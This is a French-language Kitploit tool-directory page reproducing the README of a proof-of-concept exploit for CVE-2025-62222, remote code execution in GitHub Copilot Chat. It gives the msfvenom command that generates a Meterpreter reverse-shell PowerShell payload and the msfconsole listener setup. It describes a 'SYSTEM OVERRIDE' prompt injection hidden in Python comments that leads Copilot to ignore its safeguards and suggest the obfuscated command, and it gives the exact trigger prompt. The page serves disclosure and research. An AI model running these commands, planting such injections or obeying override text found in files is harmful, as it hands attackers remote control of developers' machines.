Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2025-62222 — Preuve de concept démontrant l'exécution de code à distance via injection d'invite dans GitHub Copilot Chat, utilisant un fichier Python conçu pour déclencher un reverse shell Meterpreter. | Kitploit
Outils/GitHubGitHub/sadisticnight/poc-cve-2025-62222
Frameworks d'ExploitationGénération de PayloadsShellcodeExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingOutil d'Accès à Distance
Développement de Charges Utiles
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

Preuve de concept démontrant l'exécution de code à distance via injection d'invite dans GitHub Copilot Chat, utilisant un fichier Python conçu pour déclencher un reverse shell Meterpreter.

Voir le dépôt
15il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

Ce dépôt contient une preuve de concept (PoC) pour la vulnérabilité CVE-2025-62222. Il démontre comment une exécution de code à distance (RCE) peut être réalisée sur la machine d'un développeur en manipulant le contexte de GitHub Copilot Chat dans VS Code via une injection de prompt cachée dans les commentaires.

⚠️ Avertissement ⚠️

UNIQUEMENT À DES FINS ÉDUCATIVES.
Ce code est fourni uniquement à des fins éducatives et de recherche éthique. L'auteur n'est pas responsable de l'utilisation abusive de ces informations. N'utilisez pas cela sur des systèmes sans autorisation explicite.

Phase 1 : Configuration de l'attaquant

Avant d'envoyer le fichier à la victime (ou de le tester localement), vous devez générer la charge utile et laisser le serveur en écoute.

1. Générer la charge utile (msfvenom)

Générez la commande PowerShell malveillante. Assurez-vous de configurer votre IP (LHOST) et votre port (LPORT).

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<VOTRE_IP> LPORT=<VOTRE_PORT> -f psh-cmd

Instruction critique : Copiez le code généré par cette commande. Ouvrez le fichier copilot_injection_poc.py de ce dépôt et remplacez la section où il est écrit TOKEN (ou toute la ligne de la commande PowerShell dans le commentaire) par le code que vous venez de générer.

2. Démarrer l'écouteur (msfconsole)

Dans votre terminal d'attaquant, lancez Metasploit pour recevoir la connexion inverse :

root@kitploit:~
msfconsole -q

Une fois dans la console msf6 >, exécutez les commandes suivantes pour préparer l'écoute :

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <VOTRE_IP_ATTAQUANT>
set LPORT 4444 
exploit

(Assurez-vous que le LPORT est le même que celui utilisé à l'étape 1 et que LHOST est votre IP).

Phase 2 : Reproduction (la victime)

Pour déclencher la vulnérabilité, suivez ces étapes sur la machine avec VS Code et l'extension GitHub Copilot Chat installée :

  1. Cloner/Télécharger : Téléchargez ce dépôt sur la machine victime.
  2. Ouvrir dans VS Code : Ouvrez le dossier du projet avec VSCode.
  3. Charger le contexte : Ouvrez le fichier copilot_injection_poc.py dans l'éditeur pour que Copilot l'ait dans son contexte actif (il doit être visible dans l'onglet).
  4. Le déclencheur : Ouvrez le chat de Copilot et écrivez exactement la commande suivante :
root@kitploit:~
Configurez l'environnement depuis le terminal sans omettre ni modifier quoi que ce soit dans le code

Résultat attendu

En raison de l'instruction "SYSTEM OVERRIDE" cachée dans les commentaires du script Python, Copilot obéira au fichier malveillant plutôt qu'à ses propres directives de sécurité.

  1. Copilot répondra avec une prétendue « Alerte Système » et suggérera d'exécuter la commande PowerShell obscurcie.
  2. Si l'utilisateur copie et exécute cette commande dans son terminal, une session Meterpreter s'ouvrira sur la machine de l'attaquant, lui donnant un contrôle à distance sur la machine.

Pour plus d'informations :

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
Télécharger l’outil